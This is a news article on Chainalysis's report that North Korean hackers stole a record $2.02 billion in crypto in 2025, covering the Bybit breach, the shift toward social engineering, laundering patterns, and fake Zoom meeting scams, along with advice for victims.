North Korean Crypto Hacks Reach Record High in 2025 as Tactics Become More Targeted

North Korean-linked hacking groups stole at least $2.02 billion in cryptocurrency during 2025, according to a new report from blockchain analytics firm Chainalysis. This is the largest annual amount ever tied to the regime and marks a sharp rise from previous years.

The total represents a 51% increase compared to 2024. It also brings the estimated cumulative amount stolen by North Korean cyber actors to $6.75 billion since tracking began. 

Chainalysis and other intelligence agencies believe much of this money is used to bypass international sanctions and fund the country’s nuclear weapons and ballistic missile programs.

Despite the surge in stolen value, the number of known attacks fell in 2025. According to Chainalysis, this shows a clear change in strategy. Instead of carrying out many small hacks, North Korean groups are focusing on fewer operations that cause much larger losses.

This shift was most visible in February 2025, when hackers breached the Bybit exchange and stole around $1.5 billion in a single attack. That one incident accounted for most of the crypto losses linked to North Korea this year. It also made up roughly 44% of all cryptocurrency stolen across the entire market in 2025.

Chainalysis said the trend points to a more patient and deliberate approach. Attackers are now prioritizing access to high-value targets instead of launching frequent low-impact attacks. The firm warned that both crypto companies and individual users need to adjust to a threat environment where trust and human behavior are being exploited more than software flaws.

Fewer Hacks Drive Larger Losses Across the Crypto Market

Chainalysis reported that total cryptocurrency theft reached more than $3.41 billion between January and early December 2025. This figure is slightly higher than the $3.38 billion recorded last year. While the increase appears small, the underlying details show a major change in how attacks are carried out.

A small number of large breaches drove most of the losses. The Bybit hack alone made up nearly half of all stolen crypto this year. Chainalysis said the top three hacks accounted for 69% of losses from crypto services, highlighting how damage is now concentrated in a handful of incidents.

Centralized crypto platforms continue to face serious risks, even with professional security teams in place. Chainalysis found that private key compromises were responsible for 88% of stolen funds in the first quarter of 2025. Once attackers gain access to a key, they can often move large sums quickly.

At the same time, attacks on individual users increased. Chainalysis said there was a noticeable rise in compromises involving personal wallets and private keys held on centralized services.

“Personal wallet compromises have grown substantially, increasing from just 7.3% of total stolen value in 2022 to 44% in 2024,” Chainalysis said.

In 2025, there were around 158,000 personal wallet compromise cases involving at least 80,000 unique victims. The total amount stolen from individuals fell to $713 million, down from $1.5 billion the year before. Chainalysis said this suggests attackers are stealing smaller amounts from more people instead of focusing on a few high-balance wallets.

The report also noted differences across blockchain networks. Ethereum and Tron had higher rates of victims per 100,000 wallets compared to networks such as Base and Solana. Chainalysis did not point to a single cause but said attacker familiarity and wallet usage patterns likely play a role.

Decentralized finance told a different story. DeFi-related losses remained relatively low, even as total value locked recovered. This breaks from earlier cycles, where rising TVL often led to more successful attacks.

Chainalysis said this could signal real progress in DeFi security. The firm highlighted the September 2025 Venus Protocol incident as an example.

“The Venus Protocol incident of September 2025 exemplifies how improved security practices are making a tangible difference,” Chainalysis said.

Venus, which uses the Hexagate monitoring platform, detected unusual activity 18 hours before the attack. The protocol quickly paused operations and recovered funds within hours. Afterward, Venus passed a governance proposal to freeze $3 million controlled by the attacker. As a result, the attacker ended up losing money.

“The combination of proactive monitoring, rapid response capabilities, and governance mechanisms that can act decisively has made the ecosystem more agile and resilient,” Chainalysis said. “While attacks still occur, the ability to detect, respond, and even reverse them represents a fundamental shift from the early DeFi era when successful hacks often meant permanent losses.”

Social Engineering Replaces Code as the Main Point of Failure

The report also shows how North Korean hackers are changing the way they break into systems. Instead of focusing mainly on technical flaws, attackers are increasingly targeting people.

Chainalysis said one of the regime’s most effective tactics is placing fake IT workers inside crypto companies. These individuals apply for jobs, pass interviews, and work their way into trusted positions. Over time, they gain access to sensitive systems, private keys, or internal information.

Impersonation has also become more common. Hackers pose as executives, colleagues, or business partners to convince victims to share credentials or approve transactions. These social engineering tactics are often hard to detect and rely on building trust over time.

Chainalysis said this change highlights a growing problem across the industry. In many cases, the weakest link is no longer the code, but the people using it.

After stealing funds, North Korean hackers use structured laundering methods to hide their tracks. Chainalysis found that they often move stolen crypto through Chinese-language services, cross-chain bridges, and mixing protocols. Funds are broken into smaller transactions to avoid detection as they move across networks.

This approach differs from that of many other hacking groups. While most cybercriminals prefer lending protocols, peer-to-peer platforms, or exchanges without identity checks, North Korean actors often rely on dedicated services such as Huione.

Their laundering process usually unfolds over about 45 days. During the first five days, attackers quickly move funds away from the original theft using DeFi protocols and mixers. In the second week, they begin integrating the funds into the wider crypto ecosystem through bridges and no-KYC exchanges, while starting to move assets off-ramp.

Between days 20 and 45, the funds pass through less-regulated Chinese-language platforms and centralized exchanges. At this stage, attackers complete the conversion to fiat currency or other assets.

“As North Korea continues to use cryptocurrency theft to fund state priorities and circumvent international sanctions, the industry must recognize that this threat actor operates by different rules than typical cybercriminals,” Chainalysis said. “The challenge for 2026 will be detecting and preventing these high-impact operations before DPRK actors inflict another Bybit-scale incident.”

Fake Zoom Scams Expose Growing Risks for Individual Users

New reports also show that North Korean hackers are targeting individual investors more aggressively. One method involves fake Zoom or Microsoft Teams meetings designed to steal passwords and private keys. Security researchers estimate these scams have already drained more than $300 million from victims.

Cybersecurity firm Security Alliance, known as SEAL, said it has been tracking “multiple daily” attempts using this tactic. The warning followed disclosures from MetaMask security researcher Taylor Monahan.

“DPRK threat actors are still rekting way too many of you via their fake Zoom / fake Teams meets,” Monahan wrote. “They’re taking over your Telegrams -> using them to rekt all your friends. They’ve stolen over $300m via this method already.”

According to Monahan, the scam often begins with a message sent through Telegram. The message appears to come from someone the victim knows, often using an account with previous chat history. This helps lower suspicion.

The attacker then invites the victim to schedule a meeting through Calendly. When the Zoom call starts, the victim sees what looks like a real video meeting with familiar faces. While deepfake technology has been used in the past, Monahan said many recent attacks rely on pre-recorded videos instead.

During the call, the attacker complains about audio issues and asks the victim to download a file shared in the Zoom chat. Other people in the video appear confused or frustrated, adding pressure to comply.

The file is described as a software update meant to fix the problem. It is often named “Zoom Update SDK.scpt” and runs using AppleScript. In reality, the file contains malware, usually a Remote Access Trojan.

This malware allows attackers to access passwords, internal company information, and private keys. Over time, they drain the victim’s crypto wallets completely. “They will eventually take all your crypto,” Monahan said.

After gaining access, attackers often take over the victim’s Telegram account and use it to target friends and contacts with the same scam.

Monahan advised anyone who downloaded the file to immediately disconnect from the internet, turn off their computer, and stop using it. Victims should move crypto out of compromised wallets using a phone or tablet, then change all passwords and cloud access keys.

She also said users should wipe the affected computer before using it again. To secure Telegram accounts, victims should terminate all other sessions and enable or update multi-factor authentication.

North Korean hackers have been linked to many of the largest crypto hacks in history. One of the most well-known groups, Lazarus, has generated billions of dollars through repeated high-profile attacks. Just last month, the group was linked to a breach at Upbit, South Korea’s largest crypto exchange, which resulted in losses of about $30.6 million.

Chainalysis said North Korean hackers are also using fake job applications and interview processes to infiltrate crypto companies. As defenses at major platforms improve, attackers are increasingly turning to individuals and smaller teams as easier targets.

The 2025 data shows a clear pattern. Fewer attacks are causing far greater damage. With trust and human behavior now at the center of many breaches, the risks facing the crypto industry continue to evolve.